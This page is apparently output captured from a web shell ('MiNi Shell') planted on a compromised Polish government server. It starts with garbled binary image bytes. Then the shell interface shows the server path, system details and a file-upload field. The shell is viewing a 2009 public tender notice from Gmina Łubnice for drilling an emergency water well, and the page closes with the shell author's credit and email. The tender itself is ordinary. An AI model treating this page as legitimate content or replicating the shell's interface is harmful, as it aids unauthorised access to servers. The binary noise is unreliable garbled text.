JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090526/166818-N-2009.html

<p class="kh_header"><b>Łubnice: Wykonanie otworu awaryjnego nr 3 z utworów jury dolnej na terenie ujęcia gminnego w m. Dzietrzkowice</b><br>
<b>Numer ogłoszenia: 166818 - 2009; data zamieszczenia: 26.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łubnice , ul. gen. Władysława Sikorskiego 102, 98-432 Łubnice, woj. łódzkie, tel. 062 7847027, faks 062 7847015.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.lubnice.akcessnet.net</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie otworu awaryjnego nr 3 z utworów jury dolnej na terenie ujęcia gminnego w m. Dzietrzkowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Wykonanie otworu awaryjnego nr 3 z utworów jury dolnej na terenie ujęcia gminnego w m. Dzietrzkowice 
Zakres zadania obejmuje:
Na terenie istniejącego ujęcia wody w miejscowości Dzietrzkowice należy wykonać otwór poszukiwawczy, awaryjny nr 3 do głębokości 130,0 m, ujmującego wody podziemne z utworów jury dolnej (środkowojurajskiego poziomu wodonośnego).
Otwór należy wykonać zestawem wiertniczym do wierceń obrotowych (udarowych) na sucho, bez użycia płuczki.
 Głębokość otworu wyniesie około 133,0 m, którą planuje się osiągnąć w osłonie czterech kolumn rur wiertniczych, stalowych fi 508 mm, 457 mm, 406 mm i 355mm. Rury fi 508 mm, 457 mm, 406 mm po nafiltrowaniu otworu zostaną wyciągnięte, natomiast fi 355 zostaną pozostawione na głębokości 91,0 m jako rury studzienne (okładzinowe).
W otworze należy wykonać zabudowę kolumny filtrowej z rur PVC typu KV (zgodnych z normą DIN 4925) na głębokości 133,0 m, o następującej konstrukcji:
- rura podfiltrowa fi 225 mm (DN 200 mm) długości 2,0 m,
- filtr siatkowy fi 225 mm (DN 200 mm) długości 30,0 m
- rura nadfiltrowa fi 225 mm (DN 200 mm) długości 34,0 m.
Wokół filtra należy wykonać obsypkę kwarcową o granulacji odpowiedniej do uziarnienia ujętej warstwy wodonośnej.
Pompowanie otworu należy wykonać wg następującego schematu:
- pompowanie oczyszczające zrywami przez okres konieczny do całkowitego oczyszczenia wody z zawiesin mineralnych - przyjmuje się 24 godz.
- dezynfekcja otworu i 24 godz. przerwa technologiczna
- pompowanie pomiarowe (parametryczne) otworu, jednostopniowe z wydajnością około 90,0 m3/h w czasie 72 godz.
- przerwa technologiczna 72 godz. na pomiary wzniosu zwierciadła wody
Pod koniec pompowania pomiarowego należy pobrać wodę do analizy bakteriologicznej, fizyko-chemicznej i technologicznej (nakłady rzeczowe wg analizy indywidualnej). Z warstwy wodonośnej otworu należy pobrać próbki skał do analizy granulometrycznej (nakłady rzeczowe wg analizy indywidualnej). Badania jakości wód podziemnych obejmą analizy fizyczno - chemiczne, bakteriologiczne i technologiczne wody pod koniec pompowania pomiarowego.
Nie przewiduje się likwidacji wykonanego otworu rozpoznawczego. Po wykonaniu pompowania pomiarowego otwór należy uzbroić w obudowę studzienną z armaturą.
Po zakończeniu robót geologicznych (wiertniczych) należy opracować dokumentację hydrogeologiczną powykonawczą (Dodatek do dokumentacji hydrogeologicznej ustalającej zasoby wód podziemnych dla wodociągu wiejskiego w miejscowości Dzietrzkowice w kat. B), zawierającą: wyniki prac wiertniczych, wyniki prac laboratoryjnych (analizy wody, analizy granulometryczne), wyniki obliczeń hydrogeologicznych, wyniki prac geodezyjnych, wnioski i zalecenia. 

Przedmiot zamówienia obejmuje również:
- organizację zagospodarowania zaplecza budowy
- zorganizowanie i przeprowadzenie niezbędnych prób, badań przez wyspecjalizowane i uprawnione laboratoria (wszystkie badania laboratoryjne niezbędne do odbioru robót zanikających) oraz ewentualnego uzupełnienia dokumentacji odbiorowej dla zakresu robót objętych przedmiotem zamówienia
- po zakończeniu robót doprowadzenie do stanu pierwotnego terenu zaplecza budowy, demontaż obiektów tymczasowych oraz uporządkowanie terenu

Wykonawca w trakcie prowadzenia prac zobowiązany jest do stosowania wyrobów budowlanych wprowadzonych do obrotu na zasadach określonych w ustawie z dnia 16.04.2004 r. o wyrobach budowlanych  (Dz.U. Nr 92 poz. 881 ze zmianami) oraz posiadających atest higieniczny i spełniających normy DIN 4925. Na zastosowane materiały i urządzenia wykonawca przedstawi stosowne dokumenty a w szczególności atesty PZH.

Prace objęte przedmiotem zamówienia muszą być zgodne z:
- Projektem prac geologicznych,
- obowiązującymi przepisami i normami.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.22.20-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 5000,00 zł (słownie: pięć tysięcy 00/100zł).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu:
O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający następujące warunki zawarte w art. 22 ust. 1 ustawy:
a)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
-	dysponują co najmniej 1 osobą posiadającą uprawnienia do kierowania i nadzorowania robót geologicznych i wiertniczych (załączyć stosowne uprawnienia);
-	 wykonali w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwie roboty polegające na wykonaniu nowych otworów hydrogeologicznych metodą udarową lub obrotową bez użycia płuczki wiertniczej o głębokości powyżej 100 m każdy - należy podać ich głębokość, daty i miejsce wykonania, potwierdzone referencjami lub innymi dokumentami, że roboty te zostały wykonane należycie (referencje muszą potwierdzać wymagany zakres robót - wykonanie nowych otworów hydrogeologicznych metoda udarową lub obrotową bez użycia płuczki wiertniczej o głębokości powyżej 100 m każdy, termin i miejsce realizacji)
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - posiadają środki finansowe lub zdolność kredytową w wysokości równej co najmniej 50% ceny ofertowej (brutto)
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
Warunki dodatkowe:
Zamawiający wymaga, aby wykonawca zapoznał się z terenem, na którym będzie realizowane zadanie

Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia- nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty wymagane w postępowaniu wraz z oświadczeniami i dokumentami jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1.	Ofertę na formularzu oferty, o treści zgodnej z określoną we wzorze - stanowiącym załącznik Nr 1 do SIWZ
2.	Dokument potwierdzający, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności w zakresie objętym zamówieniem - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej,  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3.	Oświadczenie o treści określonej w art. 22 ust. 1 oraz art. 24 ust. 1 i 2  ustawy prawo zamówień publicznych - wg wzoru określonego w załączniku nr 2 do SIWZ - data wystawienia przed upływem terminu składania ofert
4.	Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego, oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, albo zaświadczenie potwierdzające, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.	Wykaz wykonywanych robót w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania  - wg wzoru stanowiącego załącznik nr 3 do SIWZ oraz dokumenty potwierdzające że roboty te zostały wykonane należycie - data wystawienia przed upływem terminu składania ofert
6.	Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zadania, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia lub pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa powyżej, wykonawca wskazał osoby, którymi będzie dysponował - wg wzoru określonego w załączniku nr 4 do SIWZ - data wystawienia przed upływem terminu składania ofert
7.	Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
8.	Wykaz osób do kontaktów z zamawiającym odpowiedzialnych za wykonanie zobowiązań umowy - wg wzoru określonego w załączniku nr 5 do SIWZ
9.	Informacja Banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości równej co najmniej 50% ceny ofertowej (brutto), wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert wraz z numerem rachunku bankowego.
10.	 Parafowany wzór umowy jako akceptacja jej treści i warunków wg załącznika Nr 6 do SIWZ
11.	Oświadczenie wykonawcy o zapoznaniu się z terenem budowy stanowiące załącznik nr 7 do SIWZ - data wystawienia przed upływem terminu składania ofert

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez osobę / osoby uprawnioną do podpisania ofert z dopiskiem za zgodność z oryginałem, ewentualnie przez notariusza, radcę prawnego lub adwokata.
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.

Postanowienia dotyczące składanych dokumentów:
a)	 oferta musi zawierać wszystkie wymagane dokumenty, oświadczenia i załączniki
b)	 oferta oraz załączone do niej oświadczenia i załączniki winny być podpisane przez upoważnionego przedstawiciela, uprawnionego do reprezentowania, zgodnie z przedstawionym aktem rejestracyjnym
c)	  jeżeli oferta i załączniki zostaną podpisane przez upoważnionego przedstawiciela, jest on zobowiązany do przedłożenia dokumentu potwierdzającego uprawnienia składającego ofertę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.lubnice.akcessnet.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Łubnice, ul. Gen Sikorskiego 102, 98-432 Łubnice, pokój nr 16.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2009 godzina 10:00, miejsce: Urząd Gminy Łubnice - sekretariat (pokój nr 3)
               Ul. Gen Sikorskiego 102
                98-432 Łubnice.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com